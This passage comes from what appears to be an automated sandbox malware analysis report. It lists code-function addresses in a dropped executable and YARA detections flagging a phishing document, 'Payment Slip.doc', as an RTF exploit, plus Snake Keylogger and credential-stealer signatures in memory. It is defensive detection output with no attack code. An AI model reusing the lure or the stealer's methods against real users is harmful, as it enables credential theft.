                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_006049708_2_00604970
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_0060AD788_2_0060AD78
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_0060F5408_2_0060F540
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_0060DD478_2_0060DD47
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_006057488_2_00605748
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_0060DD588_2_0060DD58
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00609F248_2_00609F24
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00609F308_2_00609F30
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_0060F5308_2_0060F530
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_006017388_2_00601738
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_006087388_2_00608738
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_006057398_2_00605739
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_006025008_2_00602500
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_0060CF008_2_0060CF00
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_006065008_2_00606500
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_0060B70A8_2_0060B70A
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_006065108_2_00606510
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_0060B7188_2_0060B718
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00605BE08_2_00605BE0
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_0060BBE08_2_0060BBE0
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_0060A3E78_2_0060A3E7
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00603BEA8_2_00603BEA
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00603BF88_2_00603BF8
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_0060A3F88_2_0060A3F8
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00600DF88_2_00600DF8
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00607BF88_2_00607BF8
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00608BFF8_2_00608BFF
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_0060D3C88_2_0060D3C8
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_0060BBCF8_2_0060BBCF
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00601BD08_2_00601BD0
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00605BD18_2_00605BD1
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_006095A08_2_006095A0
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_0060EBA68_2_0060EBA6
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_006069A88_2_006069A8
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_0060EBB08_2_0060EBB0
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_0060D3B88_2_0060D3B8
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_006049808_2_00604980
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_0060AD888_2_0060AD88
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_006095948_2_00609594
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_006029988_2_00602998
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_006069988_2_00606998
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C1A5E88_2_00C1A5E8
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C113608_2_00C11360
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C1D4C88_2_00C1D4C8
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C134D88_2_00C134D8
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C1F0D88_2_00C1F0D8
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C1BEE88_2_00C1BEE8
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C1F0E88_2_00C1F0E8
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C11CF08_2_00C11CF0
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C1A8F98_2_00C1A8F9
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C104F88_2_00C104F8
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C126808_2_00C12680
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C1CE888_2_00C1CE88
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C10E8B8_2_00C10E8B
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C10E988_2_00C10E98
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C1EAA88_2_00C1EAA8
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C1B8A88_2_00C1B8A8
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C100408_2_00C10040
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C1C8488_2_00C1C848
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C1FA488_2_00C1FA48
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C1B2688_2_00C1B268
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C13E688_2_00C13E68
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C1E4688_2_00C1E468
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C1C2088_2_00C1C208
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C1F4088_2_00C1F408
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C130108_2_00C13010
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C100128_2_00C10012
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C118188_2_00C11818
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C1AC188_2_00C1AC18
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C1DE288_2_00C1DE28
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C1AC288_2_00C1AC28
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C118288_2_00C11828
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C109C08_2_00C109C0
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C1EDC88_2_00C1EDC8
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C1BBC88_2_00C1BBC8
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C109D08_2_00C109D0
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C1D7E88_2_00C1D7E8
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C1E7888_2_00C1E788
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C1B5888_2_00C1B588
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C1399D8_2_00C1399D
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C139A08_2_00C139A0
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C1D1A08_2_00C1D1A0
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C1D1A88_2_00C1D1A8
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C121B88_2_00C121B8
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C1E1488_2_00C1E148
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C1AF488_2_00C1AF48
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C12B488_2_00C12B48
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C1134F8_2_00C1134F
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C1CB578_2_00C1CB57
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C1CB688_2_00C1CB68
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C1DB088_2_00C1DB08
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C1A9088_2_00C1A908
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C105088_2_00C10508
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C1F7288_2_00C1F728
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C1C5288_2_00C1C528
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C300408_2_00C30040
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C3C8C18_2_00C3C8C1
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C3AEC08_2_00C3AEC0
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C334C88_2_00C334C8
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C34ECE8_2_00C34ECE
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C3C8D08_2_00C3C8D0
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C368DA8_2_00C368DA
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C34ED88_2_00C34ED8
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C3E4E08_2_00C3E4E0
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C368E88_2_00C368E8
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C382F88_2_00C382F8
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C34A808_2_00C34A80
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C364808_2_00C36480
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C3DE888_2_00C3DE88
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C364908_2_00C36490
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C37E9E8_2_00C37E9E
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C398A28_2_00C398A2
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C37EA08_2_00C37EA0
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C3F2A88_2_00C3F2A8
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C398B08_2_00C398B0
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C3AEB08_2_00C3AEB0
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C334B98_2_00C334B9
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C37A488_2_00C37A48
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C394488_2_00C39448
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C3AA598_2_00C3AA59
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C394588_2_00C39458
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C3305F8_2_00C3305F
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C3C4688_2_00C3C468
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C3AA688_2_00C3AA68
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C330708_2_00C33070
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C34A708_2_00C34A70
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C3C4788_2_00C3C478
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C3DE788_2_00C3DE78
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C390008_2_00C39000
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C3EE108_2_00C3EE10
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C3C0108_2_00C3C010
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C3001B8_2_00C3001B
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C3461A8_2_00C3461A
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C3C0208_2_00C3C020
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C346288_2_00C34628
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C360288_2_00C36028
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C3DA308_2_00C3DA30
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C360388_2_00C36038
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C37A3E8_2_00C37A3E
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C341C08_2_00C341C0
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C3BBC88_2_00C3BBC8
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C35BD28_2_00C35BD2
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C341D08_2_00C341D0
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C3FBD88_2_00C3FBD8
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C3D5D88_2_00C3D5D8
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C35BE08_2_00C35BE0
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C375F08_2_00C375F0
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C38FF08_2_00C38FF0
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C3D1808_2_00C3D180
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C357888_2_00C35788
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C371888_2_00C37188
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C371988_2_00C37198
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C38B988_2_00C38B98
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C38BA88_2_00C38BA8
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C3BBB88_2_00C3BBB8
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C36D408_2_00C36D40
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C3F7408_2_00C3F740
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C387408_2_00C38740
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C387508_2_00C38750
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C3B7608_2_00C3B760
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C33D698_2_00C33D69
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C3B7708_2_00C3B770
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C357788_2_00C35778
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C3E9788_2_00C3E978
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C33D788_2_00C33D78
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C3B3088_2_00C3B308
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C39D088_2_00C39D08
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C339108_2_00C33910
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C3B3188_2_00C3B318
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C339208_2_00C33920
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C353268_2_00C35326
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C3CD288_2_00C3CD28
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C3F7318_2_00C3F731
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C353308_2_00C35330
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C36D308_2_00C36D30
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00D650D88_2_00D650D8
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00D649F88_2_00D649F8
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00D657B88_2_00D657B8
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00D635588_2_00D63558
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00D600408_2_00D60040
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00D62E788_2_00D62E78
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00D643188_2_00D64318
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00D63C388_2_00D63C38
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00D60ED88_2_00D60ED8
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00D650CD8_2_00D650CD
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00D649F48_2_00D649F4
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00D62AFC8_2_00D62AFC
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00D657B18_2_00D657B1
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00D635518_2_00D63551
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00D62E6F8_2_00D62E6F
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00D643158_2_00D64315
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00D62B008_2_00D62B00
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00D63C348_2_00D63C34
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00D621308_2_00D62130
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00D6212C8_2_00D6212C
                  Source: Payment Slip.doc, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                  Source: 8.2.vvndewepeter91026.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 8.2.vvndewepeter91026.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 8.2.vvndewepeter91026.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 5.2.vvndewepeter91026.exe.3588d18.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 5.2.vvndewepeter91026.exe.3588d18.7.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 5.2.vvndewepeter91026.exe.3588d18.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 5.2.vvndewepeter91026.exe.3722a30.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 5.2.vvndewepeter91026.exe.3722a30.6.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 5.2.vvndewepeter91026.exe.3722a30.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 5.2.vvndewepeter91026.exe.3722a30.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 5.2.vvndewepeter91026.exe.3722a30.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 5.2.vvndewepeter91026.exe.3588d18.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 5.2.vvndewepeter91026.exe.3588d18.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000008.00000002.913113287.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000005.00000002.406724627.000000000369E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000005.00000002.406724627.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: vvndewepeter91026.exe PID: 3524, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
